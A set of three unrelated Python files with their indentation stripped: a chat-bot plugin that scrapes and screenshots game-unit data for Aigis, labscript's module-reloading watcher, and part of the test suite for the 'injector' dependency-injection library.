match = re.findall("(?<=<textarea name=\"msg\" rows=\"26\" cols=\"100\">)[\s\S]*?(?=</textarea>)", resp.text)
if match[0] == "":
raise UnitException("Missing Page")
table = match[0].split("\n")
tokens = ['**ステータス', '**[[スキル]]', '**[[スキル覚醒]]', '**[[アビリティ]]', '**クラス特性']
ids = []
# 获取这几个section后面的id, 用来当锚点
for line in table:
for token in tokens:
if token in line:
id = re.findall("(?<=\[#).*?(?=\])", line)[-1]
ids.append(id)
# print(repr(ids))
# fetch the attribute page
resp = requests.get(
''.join((
BASE_URL,
"?",
parse.quote(name, encoding="euc-jp")
)),
headers=HEADERS
)
logging.info("Parsing...")
# parse the page
soup = BeautifulSoup(resp.text, "lxml")
# styles
css = """<style>
*{padding:0;margin:0;font-size: 95%;}
body{opacity:0.9;background:white;background-size:800px;width:900px;font-family:"PixelMPlus12", "Pingfang SC","Microsoft Yahei", "Wenquanyi Micro Hei" ;}
.floatleft, .floatLeft{float: left;margin-right: 3px;}
.clear{display: block;visibility: visible;min-height: 0;clear: both;}
a{color: #006FD6;text-decoration: none;outline: none;}
.wrapTable{width:100%}
table{border-spacing: 0;margin: 0 0 6px;border: #ccc 1px solid;}
.style_td {background-color: #fafafa!important;padding: 5px;margin: 1px;border: 1px solid #e0e0e0;}
.style_th {padding: 5px;margin: 1px;background-color: #EEEEEE;border: 1px solid #e0e0e0;}
#h3_content_1_1 + .ie5 .style_td, #h3_content_1_5 + .ie5 .style_td{padding: 5px;margin: 1px;background-color: #EEEEEE!important;}
h3, h1{border-bottom: 1px solid #a2a9b1;font-size: 20px;margin-bottom: 10px;}
.anchor_super, .jumpmenu {display: none}
h3 a {color: black!important}
h4 {margin-bottom: 10px;}
</style>"""
for a in soup.find_all("a"):
# remove every edit ("編集") link
if a and "編集" in str(a):
a.decompose()
# utf8
inner_html = ['<meta charset="utf-8" />', css]
last_modified_str = soup.find(id='lastmodified').text
last_modified_day = re.findall('\d\d\d\d-\d\d-\d\d', last_modified_str)[0]
last_modified_time = re.findall('\d+:\d+:\d+', last_modified_str)[0]
inner_html.append('<h1>{}</h1><h2>本地更新时间: {}</h2><h2>页面更新时间: {}</h2>'.format(
name,
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())),
last_modified_day + ' ' + last_modified_time
))
# split out the sections
for id in ids:
html = soup.find("a", id=id)
if html:
html = html.parent
tag = html.name
inner_html.append(str(html).replace('\n', ''))
html = html.findNext('div')
inner_html.append(str(html).replace('\n', ''))
for sb in html.next_siblings:
if type(sb) == Tag:
if sb.get('id') == 'h4_content_1_2':
break
if sb.name == tag:
break
inner_html.append(str(sb).replace("\n", ""))
inner_html = "".join(inner_html)
# work inside a temp directory
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'cache.html'), 'w', encoding='utf-8') as fp:
fp.write(inner_html)
logging.info("Capturing...")
driver = webdriver.PhantomJS()
driver.get(os.path.join(tmpdir, 'cache.html'))
# take a screenshot
driver.save_screenshot(os.path.join(tmpdir, name + ".png"))
driver.quit()
logging.info("Converting...")
# convert to RGB: smaller, and convenient to save as jpg
image = Image.open(os.path.join(tmpdir, name + ".png")).convert("RGB")
logging.info("Done!")
return image
def get_conne_pic(names, sorter=None, hidden_fields=[14, 15, 16, 20, 24]):
"""
获取圆爹dps表的图片. 提供过滤与排序的功能.
:param names: str list, 圆爹版的单位名称表. str可为正则.
:param sorter: 排序列, 为1开始的正整数.
:param hidden_fields: 要隐藏的列.
:return: 一个PIL的image实例, 可以用save方法保存.
"""
logging.info("Grabbing ...")
resp = requests.get(
'http://www116.sakura.ne.jp/~kuromoji/aigis_dps.htm',
headers=HEADERS
)
logging.info("Parsing...")
resp.encoding = 'shift-jis'
soup = BeautifulSoup(resp.text, "lxml")
# locate the main table
table = soup.find('table', id='sorter')
thead = table.thead
tbody = table.tbody
trs = []
# walk the requested names and extract the matching tr rows
inexistence = []
for name in names:
tds = tbody.find_all(text=re.compile('^' + name + '$'))
if not tds:
inexistence.append(name)
continue
for td in tds:
tr = td.parent.parent.parent
tds_ = tr.find_all('td')
trs.append(tr.extract())
if sorter:
trs.sort(key=lambda tr: int(tr.find_all('td')[sorter - 1].text) if tr.find_all('td')[sorter - 1].text else 0, reverse=True)
tbody.clear()
for tr in trs:
tbody.append(tr)
# build a new page
new_soup = BeautifulSoup('<html><head><meta charset="utf-8"></head><body></body></html>', 'lxml')
for css in soup.find_all('link'):
if css.get('href'):
css['href'] = 'http://www116.sakura.ne.jp/~kuromoji/' + css.get('href')
new_soup.html.head.append(css)
new_soup.html.body.append(table)
# new_soup.html.body.append(BeautifulSoup('<div id="calc" class="clear"></div>', 'lxml'))
widths = [3, 7, 10, 1.25, 3.25, 3.25, 3, 3, 2, 2, 2, 3.75, 2.5, 3.25, 3.25, 10.50, 3, 3.25, 3, 2, 3.25, 3.25, 3.25, 3.25, 3.25, 3.25, 3.25]
width = 0
for w in widths:
width += w
csses = ['<style>']
for field in hidden_fields:
width -= widths[field - 1]
csses.append('.aigis_dps tr td:nth-of-type({}){{display:none}}'.format(field))
csses.append('.aigis_dps tr th:nth-of-type({}){{display:none}}'.format(field))
csses.append('</style>')
new_soup.html.head.append(BeautifulSoup(''.join(csses), 'lxml'))
# partial CSS scraped from the conne page
new_soup.html.head.append(BeautifulSoup(
('<style>'
'a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{{display:block}}body{{line-height:1}}ol,ul{{list-style:none}}blockquote,q{{quotes:none}}blockquote:after,blockquote:before,q:after,q:before{{content:'';content:none}}table{{border-collapse:collapse;border-spacing:0}}'
'table{{line-height: 1.125;}}'
'td,th{{vertical-align:middle}}'
'tr.hyde {{display: table-row;}}'
'body{{font-size: 70%;width: {}em;font-family:"PixelMPlus12", "Pingfang SC",\"Microsoft Yahei\", \"Wenquanyi Micro Hei\";}}'
'</style>'.format(width + 10))
, 'lxml'))
# write out the html
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'cache.html'), 'w', encoding='utf-8') as fp:
fp.write(str(new_soup))
# with open('cache.html', 'w', encoding='utf-8') as fp:
# fp.write(str(new_soup))
logging.info("Capturing...")
driver = webdriver.PhantomJS()
driver.get(os.path.join(tmpdir, 'cache.html'))
driver.save_screenshot(os.path.join(tmpdir, 'cache.png'))
driver.quit()
logging.info("Converting...")
# convert to RGB: smaller, and convenient to save as jpg
image = Image.open(os.path.join(tmpdir, "cache.png")).convert('RGB')
logging.info("Done!")
return inexistence, image
def status_worker(bot, message, name, refresh):
"""
Process worker that fetches the status picture.
"""
full_path = os.path.join(config['cq_root_dir'], config['cq_image_dir'], 'unit', name + '.png')
if not os.path.exists(os.path.join(config['cq_root_dir'], config['cq_image_dir'], 'unit')):
os.mkdir(os.path.join(config['cq_root_dir'], config['cq_image_dir'], 'unit'))
# no cache yet, or a refresh was requested
if not os.path.exists(full_path) or refresh:
try:
image = get_status_pic(name)
except UnitException as e:
reply(bot, message, str(e))
return
except Exception as e:
reply(bot, message, '汪汪汪? 可能是网络问题, 重试一下吧')
raise e
return
image.save(full_path)
reply(bot, message, str(CQImage(os.path.join("unit", name + ".png"))))
def status(bot, message):
"""#status [-h] [-f] 单位
-h : 打印本帮助
-f : 强制刷新
单位 : 可以是单位黑话, 原名, 也可以是职业名; 懒到一定程度的话可以直接 稀有+职业的形式
例:
#status 狗蛋
#status 猫又 (猫又是职业)
#status 黑风水 (将被拆成黑+风水)
"""
try:
cmd, *args = shlex.split(message.text)
except ValueError:
return False
if not cmd[0] in config['trigger']:
return False
if not cmd[1:] == 'status':
return False
try:
options, args = getopt.gnu_getopt(args, 'hf')
except getopt.GetoptError:
# bad format
reply(bot, message, status.__doc__)
return True
refresh = False
# 拆参数
for o, a in options:
if o == '-h':
# help
reply(bot, message, status.__doc__)
return True
elif o == '-f':
refresh = True
# a unit argument is required
if len(args) < 1:
reply(bot, message, status.__doc__)
return True
target_name = args[0]
# look up the unit
target = Unit.objects(Q(name=target_name) | Q(nickname=target_name)).first()
# maybe it's a class name
if not target:
class_ = Class.objects(Q(name=target_name) | Q(translate=target_name) | Q(nickname=target_name)).first()
if class_:
target = Unit.objects(class_=class_)
# maybe it's rarity + class name
if not target:
rarity = RARITY.find(target_name[:1])
if rarity != -1:
class_name = target_name[1:]
class_ = Class.objects(Q(name=class_name) | Q(translate=class_name) | Q(nickname=class_name)).first()
if not class_:
reply(bot, message, '没找到职业{}'.format(class_name))
return True
target = Unit.objects(Q(class_=class_) & Q(rarity=rarity))
# is the result a list (QuerySet)?
if isinstance(target, QuerySet):
# more than one result: return the full list of names
if len(target) > 1:
msg = '{}不止一个单位...以下列出所有单位名\n'.format(target_name)
for unit in target:
msg += '\n[{}][{}]{}'.format(RARITY[unit.rarity], unit.class_.name, unit.name)
reply(bot, message, msg)
return True
# exactly one result: that's the one
elif len(target) == 1:
target = target[0]
# still not found by now -- embarrassing
if not target:
reply(bot, message, '没找到{}...'.format(target_name))
return True
reply(bot, message, '{}, 汪'.format(target.name))
# spawn a new process to grab the picture
multiprocessing.Process(target=status_worker, args=(bot, message, target.name, refresh)).start()
return True
SORTER_ALIAS = {
'hp': 6,
'atk': 7,
'def': 8,
'mr': 9,
'dps': 21
}
def conne_worker(bot, message, names, full=False, sorter=None):
"""
Process worker that fetches the conne DPS picture.
"""
file_name = 'conne' + str(int(time.time())) + '.png'
full_path = os.path.join(config['cq_root_dir'], config['cq_image_dir'], file_name)
hidden_fields = [14, 15, 16, 20, 24]
if full:
hidden_fields = []
try:
inexistence, image = get_conne_pic(names, sorter, hidden_fields)
except Exception as e:
reply(bot, message, '汪汪汪? 可能是网络问题, 重试一下吧')
raise e
return
if inexistence:
# if some units were not found, report which ones
reply(bot, message, '以下单位圆爹站好像没找到: {}'.format(', '.join(inexistence)))
if len(inexistence) != len(names):
# fine as long as at least one was found
image.save(full_path)
reply(bot, message, CQImage(file_name))
def conne(bot, message):
"""#conne [-h] [-f] [-s sorter] 单位...
-h : 打印本帮助
-f : 输出所有的列. 默认隐藏: 物理一击线, 魔法一击线, 补足, 属性, 600防dps
-s sorter : 排序. 接受以下参数: hp, atk, def, mr, dps
单位... : 可以是单位黑话, 原名, 也可以是职业名. 接受多个单位, 空格隔开.
注: 圆爹只收录了金以上的单位.
例:
#conne 狗蛋
#conne -s dps 风水
#conne -f -s atk 狮子奶 冬马
"""
try:
cmd, *args = shlex.split(message.text)
except ValueError:
return False
if not cmd[0] in config['trigger']:
return False
if not cmd[1:] == 'conne':
return False
try:
options, args = getopt.gnu_getopt(args, 'hfs:')
except getopt.GetoptError:
# bad format
reply(bot, message, conne.__doc__)
return True
full_fields = False
sorter = None
# parse options
for o, a in options:
if o == '-h':
# help
reply(bot, message, conne.__doc__)
return True
elif o == '-f':
full_fields = True
elif o == '-s':
if SORTER_ALIAS.get(a):
sorter = SORTER_ALIAS.get(a)
else:
reply(bot, message, conne.__doc__)
return True
# a unit argument is required
if len(args) < 1:
reply(bot, message, conne.__doc__)
return True
names = []
for target_name in args:
# look up the unit
target = Unit.objects(Q(name=target_name) | Q(nickname=target_name)).first()
# not a unit: try a class name
if not target:
class_ = Class.objects(Q(name=target_name) | Q(translate=target_name) | Q(nickname=target_name)).first()
if class_:
target = Unit.objects(Q(class_=class_) & Q(rarity__gte=3))
# maybe it's rarity + class name
if not target:
rarity = RARITY.find(target_name[:1])
if rarity != -1:
class_name = target_name[1:]
class_ = Class.objects(Q(name=class_name) | Q(translate=class_name) | Q(nickname=class_name)).first()
if not class_:
reply(bot, message, '没找到职业{}'.format(class_name))
return True
target = Unit.objects(Q(class_=class_) & Q(rarity=rarity))
if not target:
reply(bot, message, '找不到单位{}...'.format(target_name))
return True
if not isinstance(target, QuerySet):
target = (target,)
for unit in target:
try:
names.index(unit.conne_name)
except ValueError:
names.append(unit.conne_name)
reply(bot, message, '汪')
# spawn a new process to grab the picture
multiprocessing.Process(target=conne_worker, args=(bot, message, names, full_fields, sorter)).start()
return True
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] %(levelname)s: %(message)s',
datefmt='%d %b %Y %H:%M:%S',
filename='unit.log',
filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
logging.info("Running...")
inexistence, image = get_conne_pic(('シビラ', ))
image.show()
# get_status_pic('刻詠の風水士リンネ')
|
modulewatcher.py | #####################################################################
# #
# modulewatcher.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the labscript suite (see #
# http://labscriptsuite.org) and is licensed under the Simplified #
# BSD License. See the license.txt file in the root of the project #
# for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
import sys
import threading
import time
import os
import imp  # deprecated in Python 3, kept for compatibility with this code's vintage
class ModuleWatcher(object):
def __init__(self, debug=False):
self.debug = debug
# A lock to hold whenever you don't want modules unloaded:
self.lock = threading.Lock()
# The whitelist is the list of names of currently loaded modules:
self.whitelist = set(sys.modules)
self.modified_times = {}
self.main = threading.Thread(target=self.mainloop)
self.main.daemon = True
self.main.start()
def mainloop(self):
while True:
time.sleep(1)
with self.lock:
self.check_and_unload()
def check_and_unload(self):
# Look through currently loaded modules:
for name, module in sys.modules.copy().items():
# Look only at the modules not in the whitelist:
if name not in self.whitelist and hasattr(module,'__file__'):
# Only consider modules which are .py files, no C extensions:
module_file = module.__file__.replace('.pyc', '.py')
if not module_file.endswith('.py') or not os.path.exists(module_file):
continue
# Check and store the modified time of the .py file:
modified_time = os.path.getmtime(module_file)
previous_modified_time = self.modified_times.setdefault(name, modified_time)
self.modified_times[name] = modified_time
if modified_time != previous_modified_time:
# A module has been modified! Unload all modules
# not in the whitelist:
message = '%s modified: all modules will be reloaded next run.\n'%module_file
sys.stderr.write(message)
if self.debug:
print("ModuleWatcher: whitelist is:")
for name in sorted(self.whitelist):
print(" " + name)
print("\nModuleWatcher: modules unloaded:")
# Acquire the import lock so that we don't unload
# modules whilst an import is in progress:
imp.acquire_lock()
try:
for name in sorted(sys.modules):
if name not in self.whitelist:
# This unloads a module. This is slightly
# more general than reload(module), but
# has the same caveats regarding existing
# references. This also means that any
# exception in the import will occur later,
# once the module is (re)imported, rather
# than now where catching the exception
# would have to be handled differently.
del sys.modules[name]
if name in self.modified_times:
del self.modified_times[name]
if self.debug:
print(" " + name)
finally:
# We're done mucking around with the cached
# modules, normal imports in other threads
# may resume:
imp.release_lock()
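# A minimal usage sketch, assuming a long-running host process; the name
# run_user_script below is hypothetical. Hold the lock whenever user modules
# must not be unloaded mid-execution:
#
#   watcher = ModuleWatcher(debug=True)
#   with watcher.lock:
#       run_user_script()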
|
injector_test.py | # encoding: utf-8
#
# Copyright (C) 2010 Alec Thomas <alec@swapoff.org>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# Author: Alec Thomas <alec@swapoff.org>
"""Functional tests for the "Injector" dependency injection framework."""
from contextlib import contextmanager
from typing import Any, NewType
import abc
import threading
import traceback
import warnings
import pytest
from injector import (
Binder, CallError, Injector, Scope, InstanceProvider, ClassProvider,
inject, noninjectable, singleton, threadlocal, UnsatisfiedRequirement,
CircularDependency, Module, Key, SingletonScope,
ScopeDecorator, with_injector, AssistedBuilder, BindingKey,
SequenceKey, MappingKey, provider, ProviderOf, ClassAssistedBuilder,
Error, UnknownArgument,
)
def prepare_basic_injection():
class B:
pass
class A:
@inject
def __init__(self, b: B):
"""Construct a new A."""
self.b = b
return A, B
def prepare_nested_injectors():
def configure(binder):
binder.bind(str, to='asd')
parent = Injector(configure)
child = parent.create_child_injector()
return parent, child
def check_exception_contains_stuff(exception, stuff):
stringified = str(exception)
for thing in stuff:
assert thing in stringified, (
'%r should be present in the exception representation: %s' % (
thing, stringified))
def test_child_injector_inherits_parent_bindings():
parent, child = prepare_nested_injectors()
assert (child.get(str) == parent.get(str))
def test_child_injector_overrides_parent_bindings():
parent, child = prepare_nested_injectors()
child.binder.bind(str, to='qwe')
assert ((parent.get(str), child.get(str)) == ('asd', 'qwe'))
def test_child_injector_rebinds_arguments_for_parent_scope():
I = Key("interface")
Cls = Key("test_class")
class A:
@inject
def __init__(self, val: I):
self.val = val
def configure_parent(binder):
binder.bind(Cls, to=A)
binder.bind(I, to="Parent")
def configure_child(binder):
binder.bind(I, to="Child")
parent = Injector(configure_parent)
assert (parent.get(Cls).val == "Parent")
child = parent.create_child_injector(configure_child)
assert (child.get(Cls).val == "Child")
def test_scopes_are_only_bound_to_root_injector():
parent, child = prepare_nested_injectors()
class A:
pass
parent.binder.bind(A, to=A, scope=singleton)
assert (parent.get(A) is child.get(A))
def test_key_cannot_be_instantiated():
Interface = Key('Interface')
with pytest.raises(Exception):
Interface()
with pytest.raises(Exception):
Injector().get(Interface)
def test_get_default_injected_instances():
A, B = prepare_basic_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
assert (injector.get(Injector) is injector)
assert (injector.get(Binder) is injector.binder)
def test_instantiate_injected_method():
A, _ = prepare_basic_injection()
a = A('Bob')
assert (a.b == 'Bob')
def test_method_decorator_is_wrapped():
A, _ = prepare_basic_injection()
assert (A.__init__.__doc__ == 'Construct a new A.')
assert (A.__init__.__name__ == '__init__')
def test_decorator_works_for_function_with_no_args():
@inject
def wrapped(*args, **kwargs):
pass
def test_providers_arent_called_for_dependencies_that_are_already_provided():
def configure(binder):
binder.bind(int, to=lambda: 1 / 0)
class A:
@inject
def __init__(self, i: int):
pass
injector = Injector(configure)
builder = injector.get(AssistedBuilder[A])
with pytest.raises(ZeroDivisionError):
builder.build()
builder.build(i=3)
def test_inject_direct():
A, B = prepare_basic_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
a = injector.get(A)
assert (isinstance(a, A))
assert (isinstance(a.b, B))
def test_configure_multiple_modules():
A, B = prepare_basic_injection()
def configure_a(binder):
binder.bind(A)
def configure_b(binder):
binder.bind(B)
injector = Injector([configure_a, configure_b])
a = injector.get(A)
assert (isinstance(a, A))
assert (isinstance(a.b, B))
def test_inject_with_missing_dependency():
A, _ = prepare_basic_injection()
def configure(binder):
binder.bind(A)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(A)
def test_inject_named_interface():
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
a = injector.get(A)
assert (isinstance(a, A))
assert (isinstance(a.b, B))
def prepare_transitive_injection():
class C:
pass
class B:
@inject
def __init__(self, c: C):
self.c = c
class A:
@inject
def __init__(self, b: B):
self.b = b
return A, B, C
def test_transitive_injection():
A, B, C = prepare_transitive_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
binder.bind(C)
injector = Injector(configure)
a = injector.get(A)
assert (isinstance(a, A))
assert (isinstance(a.b, B))
assert (isinstance(a.b.c, C))
def test_transitive_injection_with_missing_dependency():
A, B, _ = prepare_transitive_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(A)
with pytest.raises(UnsatisfiedRequirement):
injector.get(B)
def test_inject_singleton():
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B, scope=SingletonScope)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert (a1.b is a2.b)
def test_inject_decorated_singleton_class():
@singleton
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert (a1.b is a2.b)
def test_threadlocal():
@threadlocal
class A:
def __init__(self):
pass
def configure(binder):
binder.bind(A)
injector = Injector(configure)
a1 = injector.get(A)
a2 = injector.get(A)
assert (a1 is a2)
a3 = [None]
ready = threading.Event()
def inject_a3():
a3[0] = injector.get(A)
ready.set()
threading.Thread(target=inject_a3).start()
ready.wait(1.0)
assert (a2 is not a3[0] and a3[0] is not None)
def test_injecting_interface_implementation():
class Interface:
pass
class Implementation:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
def configure(binder):
binder.bind(A)
binder.bind(Interface, to=Implementation)
injector = Injector(configure)
a = injector.get(A)
assert (isinstance(a.i, Implementation))
def test_cyclic_dependencies():
class Interface:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
class B:
@inject
def __init__(self, a: A):
self.a = a
def configure(binder):
binder.bind(Interface, to=B)
binder.bind(A)
injector = Injector(configure)
with pytest.raises(CircularDependency):
injector.get(A)
def test_dependency_cycle_can_be_broken_by_assisted_building():
class Interface:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
class B:
@inject
def __init__(self, a_builder: AssistedBuilder[A]):
self.a = a_builder.build(i=self)
def configure(binder):
binder.bind(Interface, to=B)
binder.bind(A)
injector = Injector(configure)
# Previously it'd detect a circular dependency here:
# 1. Constructing A requires Interface (bound to B)
# 2. Constructing B requires assisted build of A
# 3. Constructing A triggers circular dependency check
assert isinstance(injector.get(A), A)
def test_that_injection_is_lazy():
class Interface:
constructed = False
def __init__(self):
Interface.constructed = True
class A:
@inject
def __init__(self, i: Interface):
self.i = i
def configure(binder):
binder.bind(Interface)
binder.bind(A)
injector = Injector(configure)
assert not (Interface.constructed)
injector.get(A)
assert (Interface.constructed)
def test_module_provider():
class MyModule(Module):
@provider
def provide_name(self) -> str:
return 'Bob'
module = MyModule()
injector = Injector(module)
assert injector.get(str) == 'Bob'
def test_module_class_gets_instantiated():
name = 'Meg'
class MyModule(Module):
def configure(self, binder):
binder.bind(str, to=name)
injector = Injector(MyModule)
assert (injector.get(str) == name)
def test_with_injector_works():
name = 'Victoria'
def configure(binder):
binder.bind(str, to=name)
class Aaa:
@with_injector(configure)
@inject
def __init__(self, username: str):
self.username = username
aaa = Aaa()
assert (aaa.username == name)
def test_bind_using_key():
Name = Key('name')
Age = Key('age')
class MyModule(Module):
@provider
def provider_name(self) -> Name:
return 'Bob'
def configure(self, binder):
binder.bind(Age, to=25)
injector = Injector(MyModule())
assert (injector.get(Age) == 25)
assert (injector.get(Name) == 'Bob')
def test_inject_using_key():
Name = Key('name')
Description = Key('description')
class MyModule(Module):
@provider
def provide_name(self) -> Name:
return 'Bob'
@provider
@inject
def provide_description(self, name: Name) -> Description:
return '%s is cool!' % name
assert (Injector(MyModule()).get(Description) == 'Bob is cool!')
def test_inject_and_provide_coexist_happily():
class MyModule(Module):
@provider
def provide_weight(self) -> float:
return 50.0
@provider
def provide_age(self) -> int:
return 25
# TODO(alec) Make provider/inject order independent.
@provider
@inject
def provide_description(self, age: int, weight: float) -> str:
return 'Bob is %d and weighs %0.1fkg' % (age, weight)
assert (Injector(MyModule()).get(str) == 'Bob is 25 and weighs 50.0kg')
def test_multibind():
Names = Key('names')
def configure_one(binder):
binder.multibind(Names, to=['Bob'])
def configure_two(binder):
binder.multibind(Names, to=['Tom'])
assert (Injector([configure_one, configure_two]).get(Names) == ['Bob', 'Tom'])
def test_provider_sequence_decorator():
Names = SequenceKey('names')
class MyModule(Module):
@provider
def bob(self) -> Names:
return ['Bob']
@provider
def tom(self) -> Names:
return ['Tom']
assert (Injector(MyModule()).get(Names) == ['Bob', 'Tom'])
def test_auto_bind():
class A:
pass
injector = Injector()
assert (isinstance(injector.get(A), A))
def test_custom_scope():
class RequestScope(Scope):
def configure(self):
self.context = None
@contextmanager
def __call__(self, request):
assert self.context is None
self.context = {}
binder = self.injector.get(Binder)
binder.bind(Request, to=request, scope=RequestScope)
yield
self.context = None
def get(self, key, provider):
if self.context is None:
raise UnsatisfiedRequirement(None, key)
try:
return self.context[key]
except KeyError:
provider = InstanceProvider(provider.get(self.injector))
self.context[key] = provider
return provider
request = ScopeDecorator(RequestScope)
class Request:
pass
@request
class Handler:
def __init__(self, request):
self.request = request
class RequestModule(Module):
def configure(self, binder):
binder.bind_scope(RequestScope)
@provider
@inject
def handler(self, request: Request) -> Handler:
return Handler(request)
injector = Injector([RequestModule()], auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
scope = injector.get(RequestScope)
request = Request()
with scope(request):
handler = injector.get(Handler)
assert (handler.request is request)
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
def test_bind_interface_of_list_of_types():
def configure(binder):
binder.multibind([int], to=[1, 2, 3])
binder.multibind([int], to=[4, 5, 6])
injector = Injector(configure)
assert (injector.get([int]) == [1, 2, 3, 4, 5, 6])
def test_provider_mapping():
StrInt = MappingKey('StrInt')
def configure(binder):
binder.multibind(StrInt, to={'one': 1})
binder.multibind(StrInt, to={'two': 2})
class MyModule(Module):
@provider
def provide_numbers(self) -> StrInt:
return {'three': 3}
@provider
def provide_more_numbers(self) -> StrInt:
return {'four': 4}
injector = Injector([configure, MyModule()])
assert (injector.get(StrInt) == {'one': 1, 'two': 2, 'three': 3, 'four': 4})
def test_binder_install():
class ModuleA(Module):
def configure(self, binder):
binder.bind(str, to='hello world')
class ModuleB(Module):
def configure(self, binder):
binder.install(ModuleA())
injector = Injector([ModuleB()])
assert (injector.get(str) == 'hello world')
def test_binder_provider_for_method_with_explicit_provider():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=InstanceProvider(1))
assert (type(provider) is InstanceProvider)
assert (provider.get(injector) == 1)
def test_binder_provider_for_method_with_instance():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=1)
assert (type(provider) is InstanceProvider)
assert (provider.get(injector) == 1)
def test_binder_provider_for_method_with_class():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int)
assert (type(provider) is ClassProvider)
assert (provider.get(injector) == 0)
def test_binder_provider_for_method_with_class_to_specific_subclass():
class A:
pass
class B(A):
pass
injector = Injector()
binder = injector.binder
provider = binder.provider_for(A, B)
assert (type(provider) is ClassProvider)
assert (isinstance(provider.get(injector), B))
def test_binder_provider_for_type_with_metaclass():
# use a metaclass in a way that works across Python 2 and 3;
# otherwise this would be:
# class A(object, metaclass=abc.ABCMeta):
#     pass
A = abc.ABCMeta('A', (object, ), {})
injector = Injector()
binder = injector.binder
assert (isinstance(binder.provider_for(A, None).get(injector), A))
def test_injecting_undecorated_class_with_missing_dependencies_raises_the_right_error():
class ClassA:
def __init__(self, parameter):
pass
class ClassB:
@inject
def __init__(self, a: ClassA):
pass
injector = Injector()
try:
injector.get(ClassB)
except CallError as ce:
check_exception_contains_stuff(ce, ('ClassA.__init__', 'ClassB'))
def test_call_to_method_with_legitimate_call_error_raises_type_error():
class A:
def __init__(self):
max()
injector = Injector()
with pytest.raises(TypeError):
injector.get(A)
def test_call_error_str_representation_handles_single_arg():
ce = CallError('zxc')
assert str(ce) == 'zxc'
class NeedsAssistance:
@inject
def __init__(self, a: str, b):
self.a = a
self.b = b
def test_assisted_builder_works_when_got_directly_from_injector():
injector = Injector()
builder = injector.get(AssistedBuilder[NeedsAssistance])
obj = builder.build(b=123)
assert ((obj.a, obj.b) == (str(), 123))
def test_assisted_builder_works_when_injected():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.obj = builder.build(b=234)
injector = Injector()
x = injector.get(X)
assert ((x.obj.a, x.obj.b) == (str(), 234))
def test_assisted_builder_uses_bindings():
Interface = Key('Interface')
def configure(binder):
binder.bind(Interface, to=NeedsAssistance)
injector = Injector(configure)
builder = injector.get(AssistedBuilder[Interface])
x = builder.build(b=333)
assert ((type(x), x.b) == (NeedsAssistance, 333))
def test_assisted_builder_uses_concrete_class_when_specified():
class X:
pass
def configure(binder):
# meant only to show that provider isn't called
binder.bind(X, to=lambda: 1 / 0)
injector = Injector(configure)
builder = injector.get(ClassAssistedBuilder[X])
builder.build()
def test_assisted_builder_injection_is_safe_to_use_with_multiple_injectors():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.builder = builder
i1, i2 = Injector(), Injector()
b1 = i1.get(X).builder
b2 = i2.get(X).builder
assert ((b1._injector, b2._injector) == (i1, i2))
def test_assisted_builder_injection_uses_the_same_binding_key_every_time():
# if we got a different BindingKey for every AssistedBuilder(...) we would get a memory leak
gen_key = lambda: BindingKey.create(AssistedBuilder[NeedsAssistance])
assert gen_key() == gen_key()
class TestThreadSafety:
def setup(self):
self.event = threading.Event()
def configure(binder):
binder.bind(str, to=lambda: self.event.wait() and 'this is str')
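# The str provider blocks on the event, so every thread spawned by
# gather_results() reaches injection before any provider returns; setting
# the event then releases them all at once to maximise contention.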
class XXX:
@inject
def __init__(self, s: str):
pass
self.injector = Injector(configure)
self.cls = XXX
def gather_results(self, count):
objects = []
lock = threading.Lock()
def target():
o = self.injector.get(self.cls)
with lock:
objects.append(o)
threads = [threading.Thread(target=target) for i in range(count)]
for t in threads:
t.start()
self.event.set()
for t in threads:
t.join()
return objects
def test_injection_is_thread_safe(self):
objects = self.gather_results(2)
assert (len(objects) == 2)
def test_singleton_scope_is_thread_safe(self):
